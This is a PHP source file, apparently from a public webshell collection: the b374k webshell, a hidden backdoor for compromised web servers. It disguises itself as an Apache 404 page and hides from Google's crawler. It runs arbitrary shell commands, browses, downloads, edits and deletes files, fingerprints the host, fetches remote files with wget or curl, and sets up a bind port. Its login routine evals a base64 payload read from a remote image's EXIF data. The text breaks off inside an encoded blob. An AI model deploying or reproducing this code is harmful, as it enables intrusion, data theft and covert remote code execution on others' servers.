mirror of
https://github.com/tennc/webshell
synced 2024-11-29 22:50:18 +00:00
4709 lines
336 KiB
PHP
4709 lines
336 KiB
PHP
|
<?php
|
||
|
|
||
|
/* (Web Shell b374k r3c0d3d by x'1n73ct|default pass:" 1n73ction ") */
|
||
|
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
|
||
|
$color = "#00ff00";
|
||
|
$default_action = 'FilesMan';
|
||
|
@define('SELF_PATH', __FILE__);
|
||
|
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
|
||
|
header('HTTP/1.0 404 Not Found');
|
||
|
exit;
|
||
|
}
|
||
|
@session_start();
|
||
|
@error_reporting(0);
|
||
|
@ini_set('error_log',NULL);
|
||
|
@ini_set('log_errors',0);
|
||
|
@ini_set('max_execution_time',0);
|
||
|
@ini_set('output_buffering',0);
|
||
|
@ini_set('display_errors', 0);
|
||
|
@set_time_limit(0);
|
||
|
@set_magic_quotes_runtime(0);
|
||
|
@define('VERSION', '2.1');
|
||
|
if( get_magic_quotes_gpc() ) {
|
||
|
function stripslashes_array($array) {
|
||
|
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
|
||
|
}
|
||
|
$_POST = stripslashes_array($_POST);
|
||
|
}
|
||
|
function printLogin() {
|
||
|
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
|
||
|
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
|
||
|
?>
|
||
|
<h1>Not Found</h1>
|
||
|
<p>The requested URL was not found on this server.</p>
|
||
|
<hr>
|
||
|
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
|
||
|
<style>
|
||
|
input { margin:0;background-color:#fff;border:1px solid #fff; }
|
||
|
</style>
|
||
|
<center>
|
||
|
<form method=post>
|
||
|
<input type=password name=pass>
|
||
|
</form></center>
|
||
|
<?php
|
||
|
exit;
|
||
|
}
|
||
|
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
|
||
|
if( empty( $auth_pass ) ||
|
||
|
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
|
||
|
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
|
||
|
else
|
||
|
printLogin();
|
||
|
|
||
|
@ini_set('log_errors',0);
|
||
|
@ini_set('output_buffering',0);
|
||
|
if(isset($_GET['dl']) && ($_GET['dl'] != "")){
|
||
|
$file = $_GET['dl'];
|
||
|
$filez = @file_get_contents($file);
|
||
|
header("Content-type: application/octet-stream");
|
||
|
header("Content-length: ".strlen($filez));
|
||
|
header("Content-disposition: attachment; filename=\"".basename($file)."\";");
|
||
|
echo $filez;
|
||
|
exit;
|
||
|
}
|
||
|
elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
|
||
|
$file = $_GET['dlgzip'];
|
||
|
$filez = gzencode(@file_get_contents($file));
|
||
|
header("Content-Type:application/x-gzip\n");
|
||
|
header("Content-length: ".strlen($filez));
|
||
|
header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
|
||
|
echo $filez;
|
||
|
exit;
|
||
|
}
|
||
|
// view image
|
||
|
if(isset($_GET['img'])){
|
||
|
@ob_clean();
|
||
|
$d = magicboom($_GET['y']);
|
||
|
$f = $_GET['img'];
|
||
|
$inf = @getimagesize($d.$f);
|
||
|
$ext = explode($f,".");
|
||
|
$ext = $ext[count($ext)-1];
|
||
|
@header("Content-type: ".$inf["mime"]);
|
||
|
@header("Cache-control: public");
|
||
|
@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
|
||
|
@header("Cache-control: max-age=".(60*60*24*7));
|
||
|
@readfile($d.$f);
|
||
|
exit;
|
||
|
}
|
||
|
|
||
|
// server software
|
||
|
$software = getenv("SERVER_SOFTWARE");
|
||
|
// check safemode
|
||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
|
||
|
// uname -a
|
||
|
$system = @php_uname();
|
||
|
// mysql
|
||
|
function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
|
||
|
function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
|
||
|
function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
|
||
|
function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
|
||
|
function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
|
||
|
// check os
|
||
|
if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
|
||
|
else $win = FALSE;
|
||
|
// change directory
|
||
|
if(isset($_GET['y'])){
|
||
|
if(@is_dir($_GET['view'])){
|
||
|
$pwd = $_GET['view'];
|
||
|
@chdir($pwd);
|
||
|
}
|
||
|
else{
|
||
|
$pwd = $_GET['y'];
|
||
|
@chdir($pwd);
|
||
|
}
|
||
|
}
|
||
|
//hdd
|
||
|
function convertByte($s) {
|
||
|
if($s >= 1073741824)
|
||
|
return sprintf('%1.2f',$s / 1073741824 ).' GB';
|
||
|
elseif($s >= 1048576)
|
||
|
return sprintf('%1.2f',$s / 1048576 ) .' MB';
|
||
|
elseif($s >= 1024)
|
||
|
return sprintf('%1.2f',$s / 1024 ) .' KB';
|
||
|
else
|
||
|
return $s .' B';
|
||
|
}
|
||
|
|
||
|
// username, id, shell prompt and working directory
|
||
|
if(!$win){
|
||
|
if(!$user = rapih(exe("whoami"))) $user = "";
|
||
|
if(!$id = rapih(exe("id"))) $id = "";
|
||
|
$prompt = $user." \$ ";
|
||
|
$pwd = @getcwd().DIRECTORY_SEPARATOR;
|
||
|
}
|
||
|
else {
|
||
|
$user = @get_current_user();
|
||
|
$id = $user;
|
||
|
$prompt = $user." >";
|
||
|
$pwd = realpath(".")."\\";
|
||
|
// find drive letters
|
||
|
$v = explode("\\",$d);
|
||
|
$v = $v[0];
|
||
|
foreach (range("A","Z") as $letter)
|
||
|
{
|
||
|
$bool = @is_dir($letter.":\\");
|
||
|
if ($bool)
|
||
|
{
|
||
|
$letters .= "<a href=\"?y=".$letter.":\\\">[ ";
|
||
|
if ($letter.":" != $v) {$letters .= $letter;}
|
||
|
else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
|
||
|
$letters .= " ]</a> ";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
function testoracle() {
|
||
|
if (function_exists('ocilogon')) { return showstat("on"); }
|
||
|
else { return showstat("off"); }
|
||
|
}
|
||
|
|
||
|
function testmssql() {
|
||
|
if (function_exists('mssql_connect')) { return showstat("on"); }
|
||
|
else { return showstat("off"); }
|
||
|
}
|
||
|
|
||
|
function showdisablefunctions() {
|
||
|
if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
|
||
|
else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
|
||
|
}
|
||
|
|
||
|
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
|
||
|
else $posix = FALSE;
|
||
|
// server ip
|
||
|
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
|
||
|
// your ip ;-)
|
||
|
$my_ip = $_SERVER['REMOTE_ADDR'];
|
||
|
$admin_id=$_SERVER['SERVER_ADMIN'];
|
||
|
$bindport = "13123";
|
||
|
$bindport_pass = "b374k";
|
||
|
|
||
|
// separate the working direcotory
|
||
|
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
|
||
|
$pwdurl = "";
|
||
|
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
|
||
|
$pathz = "";
|
||
|
for($j = 0 ; $j <= $i ; $j++){
|
||
|
$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
|
||
|
}
|
||
|
$pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
|
||
|
}
|
||
|
|
||
|
// rename file or folder
|
||
|
if(isset($_POST['rename'])){
|
||
|
$old = $_POST['oldname'];
|
||
|
$new = $_POST['newname'];
|
||
|
@rename($pwd.$old,$pwd.$new);
|
||
|
$file = $pwd.$new;
|
||
|
}
|
||
|
if(isset($_POST['chmod'])){
|
||
|
$name = $_POST['name'];
|
||
|
$value = $_POST['newvalue'];
|
||
|
if (strlen($value)==3){
|
||
|
$value = 0 . "" . $value;}
|
||
|
@chmod($pwd.$name,octdec($value));
|
||
|
$file = $pwd.$name;}
|
||
|
|
||
|
if(isset($_POST['chmod_folder'])){
|
||
|
$name = $_POST['name'];
|
||
|
$value = $_POST['newvalue'];
|
||
|
if (strlen($value)==3){
|
||
|
$value = 0 . "" . $value;}
|
||
|
@chmod($pwd.$name,octdec($value));
|
||
|
$file = $pwd.$name;}
|
||
|
|
||
|
|
||
|
// print useful info
|
||
|
$buff = "Software : <b>".$software."</b><br />";
|
||
|
$buff .= "System OS : <b>".$system."</b><br />";
|
||
|
if($id != "") $buff .= "ID : <b>".$id."</b><br />";
|
||
|
$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
|
||
|
$buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
|
||
|
$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
|
||
|
if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
|
||
|
else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
|
||
|
$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
|
||
|
$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
|
||
|
$buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>";
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
function rapih($text){
|
||
|
return trim(str_replace("<br />","",$text));
|
||
|
}
|
||
|
|
||
|
function magicboom($text){
|
||
|
if (!get_magic_quotes_gpc()) {
|
||
|
return $text;
|
||
|
}
|
||
|
return stripslashes($text);
|
||
|
}
|
||
|
|
||
|
function showdir($pwd,$prompt){
|
||
|
$fname = array();
|
||
|
$dname = array();
|
||
|
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
|
||
|
else $posix = FALSE;
|
||
|
$user = "????:????";
|
||
|
if($dh = @scandir($pwd)){
|
||
|
foreach($dh as $file){
|
||
|
if(is_dir($file)){
|
||
|
$dname[] = $file;
|
||
|
}
|
||
|
elseif(is_file($file)){
|
||
|
$fname[] = $file;
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
if($dh = @opendir($pwd)){
|
||
|
while($file = @readdir($dh)){
|
||
|
if(@is_dir($file)){
|
||
|
$dname[] = $file;
|
||
|
}
|
||
|
elseif(@is_file($file)){
|
||
|
$fname[] = $file;
|
||
|
}
|
||
|
}
|
||
|
@closedir($dh);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
|
||
|
sort($fname);
|
||
|
sort($dname);
|
||
|
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
|
||
|
$tree = @sizeof($path);
|
||
|
$parent = "";
|
||
|
$buff = "
|
||
|
<form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
|
||
|
<table class=\"cmdbox\" style=\"width:50%;\">
|
||
|
<tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
|
||
|
</form>
|
||
|
<form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
|
||
|
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
|
||
|
<tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
|
||
|
</form></table><table class=\"explore\">
|
||
|
<tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
|
||
|
";
|
||
|
if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
|
||
|
else $parent = $pwd;
|
||
|
|
||
|
foreach($dname as $folder){
|
||
|
if($folder == ".") {
|
||
|
if(!$win && $posix){
|
||
|
$name=@posix_getpwuid(@fileowner($folder));
|
||
|
$group=@posix_getgrgid(@filegroup($folder));
|
||
|
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
|
||
|
}
|
||
|
else {
|
||
|
$owner = $user;
|
||
|
}
|
||
|
$buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
|
||
|
<td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
|
||
|
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
|
||
|
<a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
|
||
|
<form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
|
||
|
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
|
||
|
</form></td>
|
||
|
|
||
|
</tr>
|
||
|
";
|
||
|
}
|
||
|
elseif($folder == "..") {
|
||
|
if(!$win && $posix){
|
||
|
$name=@posix_getpwuid(@fileowner($folder));
|
||
|
$group=@posix_getgrgid(@filegroup($folder));
|
||
|
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
|
||
|
}
|
||
|
else {
|
||
|
$owner = $user;
|
||
|
}
|
||
|
$buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
|
||
|
<td style=\"text-align:center;\">".$owner."</td>
|
||
|
<td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
|
||
|
<td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
|
||
|
<form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
|
||
|
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
|
||
|
</form>
|
||
|
</td></tr>";
|
||
|
}
|
||
|
else {
|
||
|
if(!$win && $posix){
|
||
|
$name=@posix_getpwuid(@fileowner($folder));
|
||
|
$group=@posix_getgrgid(@filegroup($folder));
|
||
|
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
|
||
|
}
|
||
|
else {
|
||
|
$owner = $user;
|
||
|
}
|
||
|
$buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
|
||
|
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
|
||
|
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
|
||
|
</form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
|
||
|
<td><center>
|
||
|
<a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
|
||
|
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
|
||
|
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
|
||
|
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
|
||
|
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
|
||
|
}
|
||
|
}
|
||
|
|
||
|
foreach($fname as $file){
|
||
|
$full = $pwd.$file;
|
||
|
if(!$win && $posix){
|
||
|
$name=@posix_getpwuid(@fileowner($folder));
|
||
|
$group=@posix_getgrgid(@filegroup($folder));
|
||
|
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
|
||
|
}
|
||
|
else {
|
||
|
$owner = $user;
|
||
|
}
|
||
|
$buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
|
||
|
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
|
||
|
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
|
||
|
</form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
|
||
|
<a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
|
||
|
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
|
||
|
<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
|
||
|
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
|
||
|
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
|
||
|
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
|
||
|
<td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
|
||
|
}
|
||
|
$buff .= "</table>";
|
||
|
return $buff;
|
||
|
}
|
||
|
|
||
|
function ukuran($file){
|
||
|
if($size = @filesize($file)){
|
||
|
if($size <= 1024) return $size;
|
||
|
else{
|
||
|
if($size <= 1024*1024) {
|
||
|
$size = @round($size / 1024,2);;
|
||
|
return "$size kb";
|
||
|
}
|
||
|
else {
|
||
|
$size = @round($size / 1024 / 1024,2);
|
||
|
return "$size mb";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
else return "???";
|
||
|
}
|
||
|
|
||
|
function exe($cmd){
|
||
|
if(function_exists('system')) {
|
||
|
@ob_start();
|
||
|
@system($cmd);
|
||
|
$buff = @ob_get_contents();
|
||
|
@ob_end_clean();
|
||
|
return $buff;
|
||
|
}
|
||
|
elseif(function_exists('exec')) {
|
||
|
@exec($cmd,$results);
|
||
|
$buff = "";
|
||
|
foreach($results as $result){
|
||
|
$buff .= $result;
|
||
|
}
|
||
|
return $buff;
|
||
|
}
|
||
|
elseif(function_exists('passthru')) {
|
||
|
@ob_start();
|
||
|
@passthru($cmd);
|
||
|
$buff = @ob_get_contents();
|
||
|
@ob_end_clean();
|
||
|
return $buff;
|
||
|
}
|
||
|
elseif(function_exists('shell_exec')){
|
||
|
$buff = @shell_exec($cmd);
|
||
|
return $buff;
|
||
|
}
|
||
|
}
|
||
|
|
||
|
function tulis($file,$text){
|
||
|
$textz = gzinflate(base64_decode($text));
|
||
|
if($filez = @fopen($file,"w"))
|
||
|
{
|
||
|
@fputs($filez,$textz);
|
||
|
@fclose($file);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
function ambil($link,$file) {
|
||
|
if($fp = @fopen($link,"r")){
|
||
|
while(!feof($fp)) {
|
||
|
$cont.= @fread($fp,1024);
|
||
|
}
|
||
|
@fclose($fp);
|
||
|
$fp2 = @fopen($file,"w");
|
||
|
@fwrite($fp2,$cont);
|
||
|
@fclose($fp2);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
function which($pr){
|
||
|
$path = exe("which $pr");
|
||
|
if(!empty($path)) { return trim($path); } else { return trim($pr); }
|
||
|
}
|
||
|
|
||
|
function download($cmd,$url){
|
||
|
$namafile = basename($url);
|
||
|
switch($cmd) {
|
||
|
case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
|
||
|
case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
|
||
|
case 'wfread' : ambil($wurl,$namafile);break;
|
||
|
case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
|
||
|
case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
|
||
|
case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
|
||
|
case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
|
||
|
default: break;
|
||
|
}
|
||
|
return $namafile;
|
||
|
}
|
||
|
|
||
|
function get_perms($file)
|
||
|
{
|
||
|
if($mode=@fileperms($file)){
|
||
|
$perms='';
|
||
|
$perms .= ($mode & 00400) ? 'r' : '-';
|
||
|
$perms .= ($mode & 00200) ? 'w' : '-';
|
||
|
$perms .= ($mode & 00100) ? 'x' : '-';
|
||
|
$perms .= ($mode & 00040) ? 'r' : '-';
|
||
|
$perms .= ($mode & 00020) ? 'w' : '-';
|
||
|
$perms .= ($mode & 00010) ? 'x' : '-';
|
||
|
$perms .= ($mode & 00004) ? 'r' : '-';
|
||
|
$perms .= ($mode & 00002) ? 'w' : '-';
|
||
|
$perms .= ($mode & 00001) ? 'x' : '-';
|
||
|
return $perms;
|
||
|
}
|
||
|
else return "??????????";
|
||
|
}
|
||
|
|
||
|
function clearspace($text){
|
||
|
return str_replace(" ","_",$text);
|
||
|
}
|
||
|
|
||
|
// net tools
|
||
|
$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
|
||
|
+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
|
||
|
P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
|
||
|
dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
|
||
|
